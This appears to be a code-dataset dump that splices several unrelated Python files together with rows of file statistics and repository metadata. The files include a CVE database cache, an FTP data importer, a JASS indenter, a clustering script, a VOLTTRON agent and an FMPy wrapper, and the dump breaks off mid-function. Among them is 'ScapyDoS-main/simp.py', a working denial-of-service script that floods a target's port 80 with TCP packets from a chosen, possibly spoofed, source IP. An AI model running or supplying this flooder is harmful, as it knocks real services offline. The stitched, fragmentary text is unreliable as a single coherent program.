def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
| 32.786611
| 79
| 0.590225
| 963
| 7,836
| 4.660436
| 0.268951
| 0.032086
| 0.018717
| 0.018939
| 0.143939
| 0.113859
| 0.085784
| 0.049465
| 0.049465
| 0.049465
| 0
| 0.004897
| 0.296325
| 7,836
| 238
| 80
| 32.92437
| 0.809032
| 0.144206
| 0
| 0.16185
| 0
| 0
| 0.083627
| 0.003216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115607
| false
| 0
| 0.086705
| 0.011561
| 0.32948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf
| 316
|
py
|
Python
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1
| 22.571429
| 42
| 0.550633
| 48
| 316
| 3.625
| 0.625
| 0.022989
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063636
| 0.303797
| 316
| 14
| 43
| 22.571429
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0.107256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7a4e994d80d1a5a6af69534d2790e8dc14f03c
| 4,354
|
py
|
Python
|
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# -----------------------------------------------------------------------------#
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| 41.075472
| 119
| 0.475195
| 406
| 4,354
| 4.955665
| 0.344828
| 0.049205
| 0.014911
| 0.02833
| 0.115308
| 0.102386
| 0.081511
| 0.049702
| 0.049702
| 0
| 0
| 0.003368
| 0.181672
| 4,354
| 105
| 120
| 41.466667
| 0.561325
| 0.307304
| 0
| 0.064516
| 0
| 0
| 0.262097
| 0.018817
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016129
| false
| 0.016129
| 0.16129
| 0
| 0.177419
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7b77f497a02a03531071b294b121357332567e
| 2,791
|
py
|
Python
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 117
|
2015-12-18T07:18:27.000Z
|
2022-03-28T00:25:54.000Z
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 8
|
2018-10-03T09:38:46.000Z
|
2021-12-13T19:51:09.000Z
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 28
|
2016-08-02T17:43:47.000Z
|
2022-03-21T08:31:12.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import re
DEBUG = False
def merge_str_literal(text: str) -> str:
def _on_match(m: re.Match):
return m.group().replace('"+"', '')
return re.sub(r'".+?"(\+".+?")+ ', _on_match, text)
lines = """
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
""".strip().splitlines()
stack = []
items = []
for line in lines:
if line.startswith('globals'):
stack.append('globals')
elif line.startswith('endglobals'):
stack.pop(-1)
stack.append('endglobals')
elif line.startswith('function'):
stack.append('function')
elif line.startswith('endfunction'):
stack.pop(-1)
stack.append('endfunction')
elif line.startswith('loop'):
stack.append('loop')
elif line.startswith('endloop'):
stack.pop(-1)
stack.append('endloop')
elif line.startswith('if'):
stack.append('if')
elif line.startswith('elseif'):
stack.pop(-1)
stack.append('elseif')
elif line.startswith('else'):
stack.pop(-1)
stack.append('else')
elif line.startswith('endif'):
stack.pop(-1)
stack.append('endif')
else:
stack.append(line[:8] + '...')
indent = len(stack) - 1
line = merge_str_literal(line)
items.append(' ' * indent + line)
DEBUG and print(f'{indent}. {line!r}', stack)
# Add empty line after endglobals and endfunction
if line.startswith('endglobals') or line.startswith('endfunction'):
items.append('')
if stack[-1] not in ['globals', 'function', 'loop', 'if', 'elseif', 'else']:
stack.pop(-1)
new_text = '\n'.join(items).strip()
print(new_text)
"""
function II1I1_II takes real II1I1__I returns nothing
local real II1I1_1I
local real st=TimerGetElapsed(II1I___I)
if st<=0 then
set II1I___I=CreateTimer()
call TimerStart(II1I___I,1000000,false,null)
endif
if(II1I1__I>0)then
loop
set II1I1_1I=II1I1__I-TimerGetElapsed(II1I___I)+st
exitwhen II1I1_1I<=0
if(II1I1_1I>bj_POLLED_WAIT_SKIP_THRESHOLD)then
call TriggerSleepAction(0.1*II1I1_1I)
else
call TriggerSleepAction(bj_POLLED_WAIT_INTERVAL)
endif
endloop
endif
endfunction
"""
| 23.258333
| 80
| 0.638839
| 360
| 2,791
| 4.741667
| 0.25
| 0.098418
| 0.094903
| 0.049209
| 0.507323
| 0.437024
| 0.437024
| 0.437024
| 0.437024
| 0.437024
| 0
| 0.041551
| 0.223934
| 2,791
| 119
| 81
| 23.453782
| 0.746537
| 0.032605
| 0
| 0.144928
| 0
| 0
| 0.342194
| 0.123731
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.014493
| 0.014493
| 0.072464
| 0.028986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7bebb9c7d420d8879b0fc07f857afa803296a1
| 5,656
|
py
|
Python
|
python/addNewData.py
|
TruX-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 5
|
2021-07-19T12:30:00.000Z
|
2022-01-14T16:41:00.000Z
|
python/addNewData.py
|
SerVal-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 10
|
2020-04-06T09:52:19.000Z
|
2021-06-01T08:05:25.000Z
|
python/addNewData.py
|
SerVal-DTF/fixminer_source
|
5ab2d6f582743c377eadb21cd466a3a25809bc2d
|
[
"MIT"
] | 5
|
2019-08-26T11:02:35.000Z
|
2021-03-23T15:42:09.000Z
|
from common.commons import *
DATA_PATH = os.environ["DATA_PATH"]
def core():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
from pairs import shapePairs
matches = shapePairs()
# 'FFmpeg','curl','nginx','openssl','redis','tmux','vlc']
matches = matches[matches.file.apply(lambda x: x in list(pattern.values()) or not ( x.startswith('linux_') or x.startswith('FFmpeg_') or x.startswith('curl_') or x.startswith('nginx_') or x.startswith('openssl_') or x.startswith('redis_') or x.startswith('tmux_') or x.startswith('vlc_')))]
from pairs import createPairs
createPairs(matches)
# # # elif job == 'importShapesPairs':
from pairs import importShape
importShape()
def checkWrongMembers():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
sizeDict = {}
for s in [(i,os.path.getsize(join(clusterPath, root, size, cluster,i))) for i in members]:
sizeDict[s[1]] = s[0]
sizeDict
if len(sizeDict) > 1:
print(join(clusterPath, root, size, cluster))
print(sizeDict.values())
def cluster():
clusterPath = join(DATA_PATH, 'shapes')
roots = listdir(clusterPath)
roots = [i for i in roots if not (i.startswith('.') or i.endswith('.pickle'))]
pattern = {}
for root in roots:
root
sizes = listdir(join(clusterPath, root))
for size in sizes:
# actions = listdir(join(clusterPath,root,size))
# for action in actions:
clusters = listdir(join(clusterPath, root, size))
for cluster in clusters:
members = listdir(join(clusterPath, root, size, cluster))
# pattern[root+'/'+size+'/'+cluster]= root +'/' +size +'/'+ members[0]
pattern[root+'/'+size+'/'+cluster]= members[0]
pattern
pairsPath = join(DATA_PATH, 'pairs')
from abstractPatch import loadPairMulti
for root in roots:
matches =loadPairMulti(root,'','shapes')
matches
sizes = matches['sizes'].unique().tolist()
for s in sizes:
match = matches[matches['sizes'] == s]
match
clusterCore(pattern,clusterPath, 'shapes', match, pairsPath, root, s, '')
def clusterCore(pattern,clusterPath, level, match, pairsPath, root, s,action ,token=''):
col_combi = match.tuples.values.tolist()
import networkx
g = networkx.Graph(col_combi)
cluster = []
for subgraph in networkx.connected_component_subgraphs(g):
logging.info('Cluster size %d',len(subgraph.nodes()))
cluster.append(subgraph.nodes())
cluster
pathMapping = dict()
if level == 'actions':
indexFile = join(pairsPath, root, s,action+'.index')
elif level == 'shapes':
indexFile = join(pairsPath, root, s + '.index')
else:
indexFile =join(pairsPath, root, s,action,token+'.index')
df = pd.read_csv(indexFile, header=None, usecols=[0, 1], index_col=[0])
pathMapping = df.to_dict()
workList = []
exportCLusters ={}
if not os.path.exists(join(clusterPath, root, s)):
print()
existingClusters = 0
else:
existingClusters = len(listdir(join(clusterPath, root, s)))
for clus in cluster:
members = [pathMapping[1][int(i)] for i in clus]
members
potentialClusters = [(key, value) for key, value in pattern.items() if key.startswith(root + '/' + s)]
potentialClusters
foundExisting = False
for pc,pcMember in potentialClusters:
if pcMember in members:
pc
foundExisting = True
exportCLusters[pc.split('/')[-1]] = members
if not foundExisting:
exportCLusters[existingClusters] = members
existingClusters= existingClusters+1
exportCLusters
for k,v in exportCLusters.items():
for f in v:
t = f, root, level, clusterPath, s, action, token, k
workList.append(t)
# for idx, clus in enumerate(cluster):
# logging.info('exporting cluster %s %s %s %d', root,s,action,idx)
# for f in clus:
# dumpFile = pathMapping[1][int(f)]
#
# t = dumpFile,root,level,clusterPath,s,action,token,idx
# workList.append(t)
from abstractPatch import dumpFilesCore
parallelRun(dumpFilesCore,workList)
# for wl in workList:
# dumpFilesCore(wl)
| 39.552448
| 299
| 0.592999
| 635
| 5,656
| 5.248819
| 0.2
| 0.040804
| 0.091209
| 0.10141
| 0.415242
| 0.380138
| 0.341134
| 0.341134
| 0.341134
| 0.341134
| 0
| 0.003672
| 0.277758
| 5,656
| 142
| 300
| 39.830986
| 0.81224
| 0.130304
| 0
| 0.357143
| 0
| 0
| 0.036145
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.071429
| 0
| 0.107143
| 0.026786
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8041c5c55101ae0dcfff5c78088fd9a509554f
| 6,805
|
py
|
Python
|
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | 1
|
2020-05-26T01:29:50.000Z
|
2020-05-26T01:29:50.000Z
|
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | null | null | null |
services/ops/LogStatisticsAgent/logstatisticsagent/agent.py
|
gnmerritt/volttron
|
ebfbf62bab77d46fd3e8d6aaca1fc4f33932ccf3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2019, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import datetime
import logging
import os
import sys
import statistics
from volttron.platform.vip.agent import Agent, RPC, Core
from volttron.platform.agent import utils
from volttron.platform.agent.utils import get_aware_utc_now
utils.setup_logging()
_log = logging.getLogger(__name__)
__version__ = '1.0'
def log_statistics(config_path, **kwargs):
"""Load the LogStatisticsAgent agent configuration and returns and instance
of the agent created using that configuration.
:param config_path: Path to a configuration file.
:type config_path: str
:returns: LogStatisticsAgent agent instance
:rtype: LogStatisticsAgent agent
"""
config = utils.load_config(config_path)
return LogStatisticsAgent(config, **kwargs)
class LogStatisticsAgent(Agent):
"""
LogStatisticsAgent reads volttron.log file size every hour,
compute the size delta from previous hour and publish the difference
with timestamp. It also publishes standard deviation every 24 hours.
:param config: Configuration dict
:type config: dict
Example configuration:
.. code-block:: python
{
"file_path" : "/home/volttron/volttron.log",
"analysis_interval_sec" : 60,
"publish_topic" : "platform/log_statistics",
"historian_topic" : "analysis/log_statistics"
}
"""
def __init__(self, config, **kwargs):
super(LogStatisticsAgent, self).__init__(**kwargs)
self.analysis_interval_sec = config["analysis_interval_sec"]
self.file_path = config["file_path"]
self.publish_topic = config["publish_topic"]
self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes file's size increment in previous time interval (60 minutes)
with timestamp.
Also publishes standard deviation of file's hourly size differences
every 24 hour.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| 38.885714
| 103
| 0.680235
| 842
| 6,805
| 5.308789
| 0.349169
| 0.026846
| 0.020134
| 0.021477
| 0.146085
| 0.108725
| 0.057718
| 0.038926
| 0.019687
| 0
| 0
| 0.006887
| 0.231888
| 6,805
| 174
| 104
| 39.109195
| 0.848288
| 0.416605
| 0
| 0.052632
| 0
| 0
| 0.108058
| 0.012682
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078947
| false
| 0.013158
| 0.105263
| 0
| 0.223684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe8661c1fd9d01528fabb6e5da9f0d2b06361f3b
| 2,857
|
py
|
Python
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 225
|
2017-05-17T22:33:38.000Z
|
2022-03-29T12:41:52.000Z
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 381
|
2017-05-20T13:31:52.000Z
|
2022-03-31T08:20:47.000Z
|
fmpy/cswrapper/__init__.py
|
CSchulzeTLK/FMPy
|
fde192346c36eb69dbaca60a96e80cdc8ef37b89
|
[
"CC-BY-3.0",
"CC-BY-4.0"
] | 90
|
2017-05-20T13:34:34.000Z
|
2022-03-31T05:14:57.000Z
|
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
